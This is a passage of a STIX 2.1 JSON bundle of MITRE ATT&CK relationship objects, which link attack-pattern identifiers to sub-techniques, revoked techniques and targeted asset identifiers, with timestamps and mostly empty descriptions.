"2020-03-20T14:28:39.733Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b2001907-166b-4d71-bb3c-9d26c871de09", "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d49eb47f-b421-4d6e-9664-d2b6b58dff14", "created": "2024-05-22T17:08:23.175Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:22:33.516Z", "description": "Asset Mapping Rationale: ", "relationship_type": "targets", "source_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d58d8b19-90bc-4a7f-840d-076be296ff20", "created": "2023-09-29T17:09:01.803Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:01.803Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5afd2ff-ca7f-4a53-b2ca-1628fda6f74d", "created": "2020-02-21T15:42:26.323Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5b532fe-3df9-4f92-a0f0-9c92823cdb6a", "created": "2023-09-28T19:43:49.584Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:43:49.584Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5c24fec-a81a-4dfb-8d41-2199b76038a5", "created": "2021-03-23T13:01:04.984Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5e908f9-eea1-4e55-a406-f24c5dc74b2d", "created": "2023-09-29T17:38:17.313Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:38:17.313Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d5ffcd6e-be9e-4efe-9822-974f3838c7db", "created": "2019-11-27T14:58:00.700Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d607d79e-a3f0-4236-946c-e434068d008b", "created": "2020-02-11T19:14:48.422Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d611b750-95e5-4f73-8f16-38db0a34a2e0", "created": "2023-09-29T17:08:23.682Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:08:23.682Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d648b3c7-77d2-42f3-a367-620621b714ab", "created": "2023-09-28T21:11:29.314Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:11:29.314Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d775a6ed-4a60-41f4-ac06-da86c27cd1de", "created": "2023-09-29T18:48:41.176Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:48:41.176Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d7b07d40-fbdb-41e9-b610-57de10fa41e5", "created": "2023-09-28T20:29:50.745Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:29:50.745Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d80f9deb-ba2a-4a07-aa23-81c423cf4a18", "created": "2023-09-29T16:46:01.992Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:46:01.992Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d89d9778-4695-4c97-bf6d-1d0fbabb41fa", "created": "2023-09-28T21:14:51.778Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:14:51.778Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d8f95008-33c9-4572-9916-023d8de449b1", "created": "2023-09-29T18:04:16.785Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:04:16.785Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d948a3b2-4873-4175-be18-ddef1c20347d", "created": "2020-03-09T13:51:07.152Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d96788b4-55dd-48df-bb9b-83b33ca24813", "created": "2023-09-28T19:55:22.376Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:55:22.376Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--36e9f5bc-ac13-4da4-a2f4-01f4877d9004", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d96f7f85-69df-4216-8470-3dd6e58db764", "created": "2024-05-22T17:23:44.104Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:33:21.338Z", "description": "Asset Mapping Rationale: Adversaries may search compromised systems to find and obtain insecurely stored credentials. ", "relationship_type": "targets", "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9de58a6-58fd-499c-ba7d-588239297179", "created": "2023-09-29T16:42:31.464Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:31.464Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d9fa7d68-a07c-4cf0-bb01-14e2c70c21d5", "created": "2023-09-28T19:51:11.687Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:51:11.687Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da0d2c02-a213-4815-a653-1e9b0a1b2841", "created": "2020-01-24T15:43:25.420Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d", "target_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da144dd2-c949-4a7f-8c8d-0cb27c52196a", "created": "2023-09-29T16:42:53.226Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:42:53.226Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da407f63-38cf-4247-b0bc-967ce74a2d78", "created": "2020-01-24T15:15:13.616Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da53b0a3-6b35-46af-b47c-f2e9f22ec683", "created": "2020-02-05T16:23:01.845Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6fb6408c-0db3-41d9-a3a1-a32e5f16454e", "target_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da771d72-c778-4c9a-acb4-01b5fc3d36c0", "created": "2023-09-29T18:06:57.332Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:57.332Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--da987131-bf37-4730-9914-323879d2b5c3", "created": "2023-09-28T20:34:11.025Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:34:11.025Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dac96d76-b9b8-4278-9f5b-62f4992e2ac8", "created": "2023-09-28T19:44:22.801Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:44:22.801Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--db46e84f-435e-4022-b484-e6d2e253660c", "created": "2023-09-29T18:06:13.468Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:13.468Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dbcc492c-782e-4418-8373-dbc7a76498b0", "created": "2023-09-29T17:45:35.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:45:35.293Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc5a3635-08a0-4321-9d26-930fbe2a3fb5", "created": "2020-01-24T14:54:42.876Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc724053-6ac6-43c6-b24a-3e1234a973de", "created": "2023-03-14T18:10:05.838Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-03-14T18:10:05.838Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc8ae1a5-aa85-4388-b175-f05bbf5f0082", "created": "2024-03-21T21:10:57.942Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-21T21:10:57.942Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dca5cde1-ebf3-4cb8-ab80-1a5ab13000fa", "created": "2020-02-05T14:17:47.193Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dd434e57-9813-4e3f-ac86-f9ddc6313704", "created": "2020-03-13T20:33:00.338Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dd9abe36-1cee-4100-a94f-105d9678fd1f", "created": "2023-09-29T18:06:35.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:06:35.470Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ddc5f723-da25-42b0-b281-4cc20d3e8da1", "created": "2023-09-27T19:49:41.528Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-27T19:49:41.528Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ddff2aa4-975a-4a89-9c1d-b0a4b3a07b63", "created": "2020-09-17T12:51:40.982Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de195a33-8461-4d6a-aa6a-cb2893904c66", "created": "2020-02-14T13:09:51.274Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": 